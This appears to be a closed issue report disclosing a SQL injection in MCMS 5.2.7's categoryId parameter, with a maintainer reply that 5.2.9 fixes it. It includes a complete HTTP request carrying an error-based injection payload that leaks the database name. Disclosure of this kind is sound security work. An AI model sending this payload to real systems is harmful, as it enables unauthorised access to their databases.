MCMS 5.2.7 SQLI

Question

MCMS 5.2.7 SQLI

Closed this issue 2 years ago · 1 comments

A suspicious point was found in the IContentDao.xml file

src/main/java/net/mingsoft/cms/dao/IContentDao.xml#221

Since the id of select maps to a method in Java, and this XML corresponds to Content, we looked directly in src/main/java/net/mingsoft/cms/action/CategoryAction.java and found a call to

net.mingsoft.base.biz.IBaseBiz#query

we can know that the suspicious injection point is categoryId, and then try to inject

POST /cms/content/list HTTP/1.1
Host:127.0.0.1:8000
Connection: close
Accept: application/json, text/plain, */*
Origin: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Referer: http://172.20.10.3:8081/ms/main.do?
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

categoryId=1' and updatexml(1,concat(0x7e,database(),0x7e),1) and 'zzz'='zzz

Answer 1 · 2022-09-09T01:41:45.000Z

5.2.9 fix it